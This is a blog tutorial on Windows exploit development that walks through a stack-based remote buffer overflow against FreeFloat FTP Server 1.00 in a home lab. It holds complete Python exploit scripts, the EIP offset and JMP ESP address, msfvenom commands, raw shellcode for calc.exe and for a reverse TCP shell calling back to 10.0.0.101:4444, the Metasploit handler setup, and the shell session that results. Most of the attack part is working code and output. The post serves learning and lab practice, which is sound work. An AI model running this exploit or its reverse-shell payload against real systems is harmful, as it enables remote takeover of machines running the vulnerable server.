Thursday, January 25, 2018

Beginning Windows Exploit Development - Stack Based (Remote) Buffer Overflows

This series of posts are based on me looking at expanding my knowledge on Windows Exploit Development. This post is based on understanding Stack Based (Remote) Buffer Overflows from the Windows perspective and exploiting same.

Before we get started, I must state clearly that this information is based on the guidance provided from fuzzysecurity.com website as shown in the references section.

For some folks reading my material may be easier, for others reading the material from Fuzzy Security will be easier. Whichever you choose, please note that this is all based on the guidance provided by those folks and thus nothing here is my original work.

Now that the attribution stuff is out of the way, let's get going.

Like the blog I'm using the vulnerable app FreeFloat FTP Server (Version 1.00)

The claim is the app is vulnerable, so the first thing to figure out is where it crashed.

Using the Python code below we can test the vulnerability with the first 1000 bytes

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import socket

junk_data = "A" * 10000



def exploit_code():
 # setup network connection
 mySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
 myConnection = mySocket.connect(('10.0.0.50',21))

 # make connection via FTP
 mySocket.recv(1024)
 mySocket.send('USER anonymous\r\n')
 mySocket.recv(1023)
 mySocket.send('PASS securitynik@securitynik.local\r\n')
 mySocket.recv(1024)
 mySocket.send('MKD ' + junk_data + '\r\n')
 mySocket.recv(1024)
 mySocket.send('QUIT\r\n')
 mySocket.close()

if __name__ == '__main__':
 exploit_code()

After starting up the FTP server and attaching immunity debugger to it, then sending the above code we get:




















From what we can see above, the program crashed and we can see our "A"s are part of both the ESP and EDI Registers.

Looking at the stack, we also see "A"s are there.

In trying to determine whether the ESP or EDI has more of the As, I first look at the memory area and calculated where the "A"s start for ESP and where it ends. I then look where the "A"s started for EDI and where does it end.

Finding the size of ESP we see:
00B3FF0C - 00B3FC2C = 2E0 (736)

Finding the size of EDI we see:
003B1BFB - 003B1AFB = 100 (256)

From above we an see ESP has the most space for our exploit code. Let's now look at this to see how we can maximize the ESP

Next up is time for us to find our return return pointer so that we can overwrite it and ultimately point to our exploited code which we will place on the stack.

To find this pattern, let's leverage Metasploit's "pattern_create.rb"
./pattern_create.rb --length 1000

Taking the pattern and modifying the script we now have:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import socket

junk_data = "A" * 1000

def exploit_code():
 # Pattern
 shellcode = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B'


 # setup network connection
 mySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
 myConnection = mySocket.connect(('10.0.0.50',21))


 # make connection via FTP
 mySocket.recv(1024)
 mySocket.send('USER anonymous\r\n')
 mySocket.recv(1023)
 mySocket.send('PASS securitynik@securitynik.local\r\n')
 mySocket.recv(1024)
 mySocket.send('MKD ' + shellcode + '\r\n')
 mySocket.recv(1024)
 mySocket.send('QUIT\r\n')
 mySocket.close()

if __name__ == '__main__':
 exploit_code()

Once again we attach Immunity to the FTP Server and send the above code. This produces the following:




















Looking at the EIP register above, we see the pattern "69413269". In considering endianess, more specifically, little endian, this multi-byte value needs to be reorder to be "69324169" which is "i2Ai" in ASCII.

When the value "i2Ai" is passed back to Metasploit's "pattern_offset.rb", we get:
./pattern_offset.rb --query i2Ai
[*] Exact match at offset 247

Looks like it takes 247 bytes to get to our EIP. Let's seek Immunity's mona.py plugin help to verify this. We will leverage mona's "findmsp" to look for the Metasploit's pattern.

Looking at the "findmsp" output we see:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
================================================================================
  Output generated by mona.py v2.0, rev 577 - Immunity Debugger
  Corelan Team - https://www.corelan.be
================================================================================
  OS : xp, release 5.1.2600
  Process being debugged : FTPServer (pid 544)
  Current mona arguments: findmsp
================================================================================
  2018-01-10 00:34:09
================================================================================
........ < truncated for brevity > ............
[+] Looking for cyclic pattern in memory
    Cyclic pattern (normal) found at 0x00b3fb29 (length 1000 bytes)
    Cyclic pattern (normal) found at 0x003b16f9 (length 1000 bytes)
    EIP contains normal pattern : 0x69413269 (offset 247)
    ESP (0x00b3fc2c) points at offset 259 in normal pattern (length 741)
    EDI (0x003b1afb) points at offset 743 in normal pattern (length 257)
........ < truncated for brevity > ............

So we see Mona also reports that our pattern 0x69413269 is at offset 247

Let's now rework our code to verify we can overwrite the EIP pointer with our own value.


 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import socket

junk_data = "A" * 1000

def exploit_code():
 # Pattern
 shellcode = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B'


 # setup network connection
 mySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
 myConnection = mySocket.connect(('10.0.0.50',21))


 # make connection via FTP
 mySocket.recv(1024)
 mySocket.send('USER anonymous\r\n')
 mySocket.recv(1023)
 mySocket.send('PASS securitynik@securitynik.local\r\n')
 mySocket.recv(1024)
 mySocket.send('MKD ' + 'A'*247 + 'BBBB' + 'C'*749 + '\r\n')
 mySocket.recv(1024)
 mySocket.send('QUIT\r\n')
 mySocket.close()

if __name__ == '__main__':
 exploit_code()

When the code is sent to the FTP Server, we see the following in Immunity




































As we can see from above, the EIP has been overwritten with "BBBB" (42424242) while our Cs can be found on the stack where our ESP register currently points along with in the EDI register.

Now its time for us to find a way to "jmp" to the ESP register.

Leveraging Mona once again. This time we use her "jmp -r esp" option. This will search for points which will allow us to jmp to the stack.












Picking on the first address "7C9D30D7", do remember this value is Little Endian. As a result, we need to change the byte order to "d7309d7c".

Modifying the code:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import socket

junk_data = "A" * 1000

def exploit_code():
 # Pattern
 shellcode = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B'


 # setup network connection
 mySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
 myConnection = mySocket.connect(('10.0.0.50',21))


 # make connection via FTP
 mySocket.recv(1024)
 mySocket.send('USER anonymous\r\n')
 mySocket.recv(1023)
 mySocket.send('PASS securitynik@securitynik.local\r\n')
 mySocket.recv(1024)
 mySocket.send('MKD ' + 'A'*247 + '\xd7\x30\x9d\x7c' + 'C'*749 + '\r\n')
 mySocket.recv(1024)
 mySocket.send('QUIT\r\n')
 mySocket.close()

if __name__ == '__main__':
 exploit_code()

Then attaching to the FTP Server process with immunity.

Similar to Fuzzy Security's recommendation, I added a breakpoint at the address "7C9D30D7" which points to "jmp esp" then initiate communication again with the FTP server, we get the following:




















As we can see above, our EIP points to the "jmp esp" which basically sends out to the stack.

Time to put our shellcode on the stack.

first up, let's leverage Metasploit's MSFVenom to generate our payload for launching "calc.exe". If this works, then we can look at gaining access via shell.

1
msfvenom --platform Windows --arch x86 --payload windows/exec CMD="calc.exe" --smallest --encoder x86/shikata_ga_nai --bad-chars '\x00\x0A\x0D' --format c --iterations 1

Putting our generated shellcode into our script we get:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
import socket

junk_data = "A" * 1000

def exploit_code():
 # Shellcode to launch calc.exe
 shellcode = (
"\xb8\xfa\x7b\xe6\xc9\xda\xdf\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x31\x31\x43\x13\x03\x43\x13\x83\xc3\xfe\x99\x13\x35\x16\xdf"
"\xdc\xc6\xe6\x80\x55\x23\xd7\x80\x02\x27\x47\x31\x40\x65\x6b"
"\xba\x04\x9e\xf8\xce\x80\x91\x49\x64\xf7\x9c\x4a\xd5\xcb\xbf"
"\xc8\x24\x18\x60\xf1\xe6\x6d\x61\x36\x1a\x9f\x33\xef\x50\x32"
"\xa4\x84\x2d\x8f\x4f\xd6\xa0\x97\xac\xae\xc3\xb6\x62\xa5\x9d"
"\x18\x84\x6a\x96\x10\x9e\x6f\x93\xeb\x15\x5b\x6f\xea\xff\x92"
"\x90\x41\x3e\x1b\x63\x9b\x06\x9b\x9c\xee\x7e\xd8\x21\xe9\x44"
"\xa3\xfd\x7c\x5f\x03\x75\x26\xbb\xb2\x5a\xb1\x48\xb8\x17\xb5"
"\x17\xdc\xa6\x1a\x2c\xd8\x23\x9d\xe3\x69\x77\xba\x27\x32\x23"
"\xa3\x7e\x9e\x82\xdc\x61\x41\x7a\x79\xe9\x6f\x6f\xf0\xb0\xe5"
"\x6e\x86\xce\x4b\x70\x98\xd0\xfb\x19\xa9\x5b\x94\x5e\x36\x8e"
"\xd1\x91\x7c\x93\x73\x3a\xd9\x41\xc6\x27\xda\xbf\x04\x5e\x59"
"\x4a\xf4\xa5\x41\x3f\xf1\xe2\xc5\xd3\x8b\x7b\xa0\xd3\x38\x7b"
"\xe1\xb7\xdf\xef\x69\x16\x7a\x88\x08\x66")

 exploitCode = '\x90' * 20 + shellcode

 # setup network connection
 mySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
 myConnection = mySocket.connect(('10.0.0.50',21))


 # make connection via FTP
 mySocket.recv(1024)
 mySocket.send('USER anonymous\r\n')
 mySocket.recv(1023)
 mySocket.send('PASS securitynik@securitynik.local\r\n')
 mySocket.recv(1024)
 mySocket.send('MKD ' + 'A'*247 + '\xd7\x30\x9d\x7c' +  exploitCode + 'C'*(749-len(exploitCode)) + '\r\n')
 mySocket.recv(1024)
 mySocket.send('QUIT\r\n')
 mySocket.close()

if __name__ == '__main__':
 exploit_code()

Looking at the tasks running before executing our script we see:

1
2
C:\>tasklist | findstr "FTPServer" & tasklist | findstr "calc.exe"
FTPServer.exe               1984 Console                 0      2,296 K

Once our script is executed we get:

1
2
3
C:\>tasklist | findstr "FTPServer" & tasklist | findstr "calc.exe"
FTPServer.exe                124 Console                 0      2,292 K
calc.exe                     560 Console                 0      2,560 K

Now that we know we were able to execute "calc.exe", time to gain access via a shell and finalizing our code.

Leveraging Metasploit MSFVenom again to setup a reverse tcp shell connection to our Metasploit handler.:

1
msfvenom --platform Windows --arch x86 --payload windows/shell/reverse_tcp LHOST=10.0.0.101 LPORT=4444 --smallest --encoder x86/shikata_ga_nai --bad-chars '\x00\x0A\x0D' --format c --iterations 1

After adding the shellcode to our script, our final script now look like:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
"""
 This code is part of me learning exploit development in a Windows Environment
 Author: Nik Alleyne
 Author Blog: http://securitynik.blogspot.com
 Date: 2018-01-10
 Exploit For: FloatFTPServer ver 1.00

"""

import socket

def exploit_code():
 # The msfvenom output below was used to generate the shellcode used to establish the reverse_tcp shell
 # msfvenom --platform Windows --arch x86 --payload windows/shell/reverse_tcp LHOST=10.0.0.101 LPORT=4444 --smallest --encoder x86/shikata_ga_nai --bad-chars '\x00\x0A\x0D' --format c --iterations 1

 shellcode = (
"\xd9\xc0\xbd\x72\x6e\xfd\x3f\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
"\x47\x83\xc0\x04\x31\x68\x14\x03\x68\x66\x8c\x08\xc3\x6e\xd2"
"\xf3\x3c\x6e\xb3\x7a\xd9\x5f\xf3\x19\xa9\xcf\xc3\x6a\xff\xe3"
"\xa8\x3f\x14\x70\xdc\x97\x1b\x31\x6b\xce\x12\xc2\xc0\x32\x34"
"\x40\x1b\x67\x96\x79\xd4\x7a\xd7\xbe\x09\x76\x85\x17\x45\x25"
"\x3a\x1c\x13\xf6\xb1\x6e\xb5\x7e\x25\x26\xb4\xaf\xf8\x3d\xef"
"\x6f\xfa\x92\x9b\x39\xe4\xf7\xa6\xf0\x9f\xc3\x5d\x03\x76\x1a"
"\x9d\xa8\xb7\x93\x6c\xb0\xf0\x13\x8f\xc7\x08\x60\x32\xd0\xce"
"\x1b\xe8\x55\xd5\xbb\x7b\xcd\x31\x3a\xaf\x88\xb2\x30\x04\xde"
"\x9d\x54\x9b\x33\x96\x60\x10\xb2\x79\xe1\x62\x91\x5d\xaa\x31"
"\xb8\xc4\x16\x97\xc5\x17\xf9\x48\x60\x53\x17\x9c\x19\x3e\x7f"
"\x51\x10\xc1\x7f\xfd\x23\xb2\x4d\xa2\x9f\x5c\xfd\x2b\x06\x9a"
"\x02\x06\xfe\x34\xfd\xa9\xff\x1d\x39\xfd\xaf\x35\xe8\x7e\x24"
"\xc6\x15\xab\xd1\xcc\x81\x5e\x26\xd1\x34\x37\x24\xd1\xa7\x9b"
"\xa1\x37\x97\x73\xe2\xe7\x57\x24\x42\x58\x3f\x2e\x4d\x87\x5f"
"\x51\x87\xa0\xf5\xbe\x7e\x98\x61\x26\xdb\x52\x10\xa7\xf1\x1e"
"\x12\x23\xf6\xdf\xdc\xc4\x73\xcc\x88\x24\xce\xae\x1e\x3a\xe4"
"\xc5\x9e\xae\x03\x4c\xc9\x46\x0e\xa9\x3d\xc9\xf1\x9c\x36\xc0"
"\x67\x5f\x20\x2d\x68\x5f\xb0\x7b\xe2\x5f\xd8\xdb\x56\x0c\xfd"
"\x23\x43\x20\xae\xb1\x6c\x11\x03\x11\x05\x9f\x7a\x55\x8a\x60"
"\xa9\x67\xf6\xb6\x97\x1d\x16\x0b")

 # variable for the exploide code
 exploitCode = '\x90' * 20 + shellcode

 # setup network socket connection to connect to the FTP server
 mySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
 myConnection = mySocket.connect(('10.0.0.50',21))


 # make connection via FTP
 mySocket.recv(1024)

 # send login information - username anonymous
 mySocket.send('USER anonymous\r\n')

 # receive the resonse
 mySocket.recv(1023)

 # send the password - securitynik@securitynik.local
 mySocket.send('PASS securitynik@securitynik.local\r\n')

 # receive the response
 mySocket.recv(1024)

 # create a large directory and overflow the buffer
 mySocket.send('MKD ' + 'A'*247 + '\xd7\x30\x9d\x7c' +  exploitCode + 'C'*(749-len(exploitCode)) + '\r\n')

 # receive the response
 mySocket.recv(1024)

 # Quit the FTP session
 mySocket.send('QUIT\r\n')

 # Close the socket connection
 mySocket.close()


if __name__ == '__main__':
 exploit_code()

Setup the msfhandler to accept our incoming connection once the exploit is successful:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
msf exploit(multi/handler) > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(multi/handler) > set LHOST 10.0.0.101
LHOST => 10.0.0.101
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.0.0.101:4444 

Once the multi handler has been created, we then execute our script again to make connection with the FTP Server and we get .... Voila a shell ....

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.50
[*] Command shell session 3 opened (10.0.0.101:4444 -> 10.0.0.50:1035) at 2018-01-11 00:43:04 -0500

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\SecurityNik\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D86F-1D13

 Directory of C:\Documents and Settings\SecurityNik\Desktop

01/08/2018  01:35 AM    <DIR>          .
01/08/2018  01:35 AM    <DIR>          ..
01/04/2018  02:58 AM               745 Easy RM to MP3 Converter.lnk
04/29/2004  05:16 PM            57,344 FTPServer.exe
12/31/2017  10:26 PM               859 WinDbg (2).lnk
               3 File(s)         58,948 bytes
               2 Dir(s)   8,639,336,448 bytes free

C:\Documents and Settings\SecurityNik\Desktop>


We can also see the network connection confirming our connectivity

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       124
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       992
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    10.0.0.50:21           10.0.0.1:56388         ESTABLISHED     124
  TCP    10.0.0.50:139          0.0.0.0:0              LISTENING       4
  TCP    10.0.0.50:1035         10.0.0.101:4444        ESTABLISHED     124
  TCP    127.0.0.1:1026         0.0.0.0:0              LISTENING       1876


We can also further confirm connectivity as a result of looking at the Metasploit sessions:

1
2
3
4
5
6
7
8
msf exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type               Information                                                                       Connection
  --  ----  ----               -----------                                                                       ----------
  3         shell x86/windows  Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Cor...  10.0.0.101:4444 -> 10.0.0.50:1035 (10.0.0.50)

At this point we can conclude this was a successful exercise and thus can close off this post.
 

References:
https://www.fuzzysecurity.com/tutorials/expDev/2.html
https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
https://www.offensive-security.com/metasploit-unleashed/Msfvenom/
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit

No comments:

Post a Comment